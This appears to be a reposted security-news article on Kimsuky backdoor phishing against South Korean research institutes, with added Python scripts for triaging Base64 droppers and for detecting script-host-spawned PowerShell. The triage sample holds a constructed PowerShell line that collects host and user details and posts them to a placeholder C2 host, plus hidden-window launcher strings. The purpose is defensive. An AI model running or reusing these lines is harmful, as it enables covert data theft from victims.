North Korea's Kimsuky Targets South Korean Research Institutes with Backdoor Attacks

admin, 2023-12-11 11:07:43

The North Korean threat actor known as Kimsuky has been observed targeting research institutes in South Korea as part of a spear-phishing campaign with the ultimate goal of distributing backdoors on compromised systems.

"The threat actor ultimately uses a backdoor to steal information and execute commands," the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last week.

The attack chains commence with an import declaration lure that's actually a malicious JSE file containing an obfuscated PowerShell script, a Base64-encoded payload, and a decoy PDF document.

The next stage entails opening the PDF file as a diversionary tactic, while the PowerShell script is executed in the background to launch the backdoor.
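
The dropper described in the two paragraphs above bundles three things in one script: obfuscated PowerShell, a Base64 payload, and a decoy PDF. The first triage question an analyst asks of such a file is "what is actually encoded in here?". The script below is an added example for this article, not the Kimsuky sample and not ASEC's tooling: it pulls every long Base64 run out of a script body, decodes it, and sorts the results into a PDF decoy, a PowerShell stage (recognised by a handful of marker strings, in UTF-8 or the UTF-16LE form that -EncodedCommand uses), or unknown. It assumes the script text has already been recovered as bytes (a .jse file is JScript.Encode-encoded and must be decoded first). The sample script, PDF bytes, PowerShell strings and URL are all constructed for the demo.

```python
"""Static triage of a script dropper that carries Base64 payloads.

Added example for this article (not the Kimsuky sample, not ASEC tooling).
Assumes the dropper's script text is already available as bytes; a .jse is
JScript.Encode-encoded and must be decoded before this step.
"""
import base64
import binascii
import re
from dataclasses import dataclass

# Runs of the Base64 alphabet, optionally padded. 40+ chars keeps identifiers out.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# Case-insensitive markers that a decoded PowerShell stage is likely to contain.
PS_MARKERS = ("$env:", "invoke-", "[system.", "iex", "frombase64string",
              "start-process", "new-object", "-windowstyle", "-encodedcommand")


@dataclass
class Blob:
    offset: int   # byte offset of the Base64 text inside the script
    kind: str     # "pdf-decoy", "powershell-stage" or "unknown"
    size: int     # decoded size in bytes
    preview: str  # start of the decoded payload, for the analyst's eyes


def _as_text(data: bytes) -> str:
    # -EncodedCommand payloads are UTF-16LE: ASCII text there has a NUL in every
    # second byte. Anything else is treated as UTF-8 (undecodable bytes dropped).
    if len(data) >= 2 and data[0] != 0 and data[1] == 0:
        return data.decode("utf-16-le", "ignore")
    return data.decode("utf-8", "ignore")


def classify(data: bytes) -> str:
    if data.startswith(b"%PDF-"):
        return "pdf-decoy"
    text = _as_text(data).lower()
    hits = sum(marker in text for marker in PS_MARKERS)
    return "powershell-stage" if hits >= 2 else "unknown"


def extract_blobs(script: bytes) -> list:
    blobs = []
    for m in B64_RE.finditer(script):
        raw = m.group(0)
        raw += b"=" * (-len(raw) % 4)        # restore padding a dropper may trim
        try:
            data = base64.b64decode(raw, validate=True)
        except (binascii.Error, ValueError):
            continue                          # alphabet-only run that is not Base64
        blobs.append(Blob(m.start(), classify(data), len(data), _as_text(data[:48])))
    return blobs


def triage(script: bytes) -> dict:
    """Blob count per kind: the first thing to check on a suspected dropper."""
    counts: dict = {}
    for blob in extract_blobs(script):
        counts[blob.kind] = counts.get(blob.kind, 0) + 1
    return counts


# ---- constructed sample input, shaped like the dropper in the article -------
DECOY_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
             b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
# A collector of the kind described: host name, user name, OS version, sent
# encoded to a remote server. The URL is a placeholder (.invalid TLD).
PS_COLLECT = ("$h=[System.Net.Dns]::GetHostName();$u=$env:USERNAME;"
              "$o=[System.Environment]::OSVersion.VersionString;"
              "$b=[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(\"$h|$u|$o\"));"
              "Invoke-WebRequest -Uri http://c2.example.invalid/ -Method Post -Body $b")
# A launcher stored the way -EncodedCommand expects it (UTF-16LE).
PS_LAUNCH = "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop','-w','hidden'"

SAMPLE_SCRIPT = (
    b'var d="' + base64.b64encode(DECOY_PDF) + b'";\n'
    b'var p="' + base64.b64encode(PS_COLLECT.encode()) + b'";\n'
    b'var e="' + base64.b64encode(PS_LAUNCH.encode("utf-16-le")) + b'";\n'
    b'var k="ThisIsNotBase64ButLooksLikeItAndDecodesToGarbage";\n'
)

if __name__ == "__main__":
    for blob in extract_blobs(SAMPLE_SCRIPT):
        print(f"@{blob.offset:<5} {blob.kind:<16} {blob.size:>5} B  {blob.preview!r}")
    print(triage(SAMPLE_SCRIPT))
```

The marker heuristic is deliberately loose (two hits out of nine); a blob that decodes to another layer of Base64, or to a compressed stream, lands in "unknown" and is the one to decode by hand next. Saving the decoded PDF to disk and comparing its hash against the document the victim saw is a quick way to confirm the decoy relationship the article describes.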

The malware, for its part, is configured to collect network information and other relevant data (i.e., host name, user name, and operating system version) and transmit the encoded details to a remote server.

It's also capable of running commands, executing additional payloads, and terminating itself, turning it into a backdoor for remote access to the infected host.
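
On the defensive side, the execution chain in this campaign (a .jse lure run by the Windows script host, PowerShell started in the background) leaves a recognisable process-creation pattern long before the backdoor beacons out. The detection sketch below is an added example, not ASEC's rule: it evaluates process-creation records for PowerShell whose parent is wscript.exe or cscript.exe, and raises the severity when the parent command line names a .jse file, the window is hidden, or an encoded command is passed. The records are constructed in the shape of Sysmon Event ID 1 fields (Image, CommandLine, ParentImage, ParentCommandLine); the paths, file names and user names are invented for the demo, and the exact PowerShell switches Kimsuky used are not stated in the article, so the hidden-window and encoded-command checks are an assumption about the common way such launchers are written.

```python
"""Detection sketch: script host (wscript.exe / cscript.exe) launching PowerShell
with a hidden window or an encoded command, the chain the article describes.

Added example, not ASEC's detection logic. Records are constructed in the shape
of Sysmon Event ID 1 fields; they are not telemetry from the campaign.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts unambiguous prefixes: -w / -win / -windowstyle and
# -e / -ec / -enc / -encodedcommand. Hidden may also be given as its enum value 1.
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:in(?:dowstyle)?)?\s+(?:hidden|1)\b")
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|n|c)?\s+[A-Za-z0-9+/]{20,}={0,2}")


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one 'Key: value | Key: value' record into a ProcessEvent."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return ProcessEvent(fields["Image"], fields["CommandLine"],
                        fields["ParentImage"], fields["ParentCommandLine"])


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> tuple[str, list[str]] | None:
    """(severity, reasons) for PowerShell spawned by a script host, else None."""
    if _basename(ev.image) not in POWERSHELL or _basename(ev.parent_image) not in SCRIPT_HOSTS:
        return None
    reasons = ["script-host-parent"]
    if ".jse" in ev.parent_command_line.lower():
        reasons.append("jse-launcher")
    if HIDDEN_RE.search(ev.command_line):
        reasons.append("hidden-window")
    if ENCODED_RE.search(ev.command_line):
        reasons.append("encoded-command")
    severity = "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"
    return severity, reasons


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Evaluate every record and keep only the ones that fire."""
    hits = []
    for line in lines:
        verdict = evaluate(parse_event(line))
        if verdict is not None:
            hits.append(verdict)
    return hits


# ---- constructed records (paths, names and payload are invented) ------------
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
ENC = base64.b64encode("Write-Output test".encode("utf-16-le")).decode()

EVENTS = [
    # 1. The article's chain: .jse run by wscript.exe, hidden window, encoded command
    f"Image: {PS} | CommandLine: powershell.exe -nop -w hidden -enc {ENC} | "
    "ParentImage: C:\\Windows\\System32\\wscript.exe | "
    "ParentCommandLine: wscript.exe C:\\Users\\alice\\Downloads\\import_declaration.jse",
    # 2. Interactive PowerShell from Explorer: not a script-host child, no alert
    f"Image: {PS} | CommandLine: powershell.exe | "
    "ParentImage: C:\\Windows\\explorer.exe | ParentCommandLine: explorer.exe",
    # 3. Logon script (.vbs) running an inventory script from a file server: low
    f"Image: {PS} | CommandLine: powershell.exe -ExecutionPolicy Bypass -File \\\\fs01\\logon\\inventory.ps1 | "
    "ParentImage: C:\\Windows\\System32\\cscript.exe | "
    "ParentCommandLine: cscript.exe //nologo \\\\fs01\\logon\\logon.vbs",
    # 4. A .js task hiding its PowerShell window: medium
    f"Image: {PS} | CommandLine: powershell.exe -WindowStyle Hidden -File C:\\scripts\\cleanup.ps1 | "
    "ParentImage: C:\\Windows\\System32\\wscript.exe | "
    "ParentCommandLine: wscript.exe C:\\scripts\\cleanup.js",
    # 5. Same chain via pwsh.exe with long switch names and no hidden window: high
    f"Image: C:\\Program Files\\PowerShell\\7\\pwsh.exe | CommandLine: pwsh.exe -NoProfile -EncodedCommand {ENC} | "
    "ParentImage: C:\\Windows\\System32\\wscript.exe | "
    "ParentCommandLine: wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\INVOICE.JSE",
]

if __name__ == "__main__":
    for severity, reasons in scan(EVENTS):
        print(f"{severity:<6} {', '.join(reasons)}")
```

Two practical points. The parent image and parent command line are taken from the creation event itself; if a source only gives you PID and PPID you have to correlate them yourself and PID reuse can mislabel the parent. And the switch regexes accept the abbreviated forms because `-w hidden` and `-enc` are what launchers actually pass; a rule that only matches `-WindowStyle` and `-EncodedCommand` misses most of them.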

Kimsuky, active since at least 2012, started off targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, before expanding its victimology footprint to encompass Europe, Russia, and the U.S.

Earlier this month, the U.S. Treasury Department sanctioned Kimsuky for gathering intelligence to support North Korea's strategic objectives, including geopolitical events, foreign policy, and diplomatic efforts.

"Kimsuky has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions," cybersecurity firm ThreatMon noted in a recent report.

The state-sponsored group has also been observed leveraging booby-trapped URLs that, when clicked, download a bogus ZIP archive masquerading as an update for the Chrome browser to deploy a malicious VBScript from Google Drive that employs the cloud storage as a conduit for data exfiltration and command-and-control (C2).

Lazarus Group Goes Phishing on Telegram

The development comes as blockchain security company SlowMist implicated the notorious North Korea-backed outfit called the Lazarus Group in a widespread phishing campaign on Telegram targeting the cryptocurrency sector.

"More recently, these hackers have escalated their tactics by posing as reputable investment institutions to execute phishing scams against various cryptocurrency project teams," the Singapore-based firm said.

After establishing rapport, the targets are deceived into downloading a malicious script under the guise of sharing an online meeting link that facilitates crypto theft.

It also follows a report from the Seoul Metropolitan Police Agency (SMPA) that accused the Lazarus sub-cluster codenamed Andariel of stealing technical information about anti-aircraft weapon systems from domestic defense companies and laundering ransomware proceeds back to North Korea.

It is estimated that more than 250 files amounting to 1.2 terabytes have been stolen in the attacks. To cover up the tracks, the adversary is said to have used servers from a local company that "rents servers to subscribers with unclear identities" as an entry point.

In addition, the group extorted 470 million won ($356,000) worth of bitcoin from three South Korean firms in ransomware attacks and laundered them through virtual asset exchanges such as Bithumb and Binance. It's worth noting that Andariel has been linked to the deployment of Maui ransomware in the past.

Originally published on the WeChat official account 知机安全: North Korea's Kimsuky Targets South Korean Research Institutes with Backdoor Attacks

Reposts should keep the link to this article (CN-SEC中文网; thanks to the original author): http://cn-sec.com/archives/2286719.html
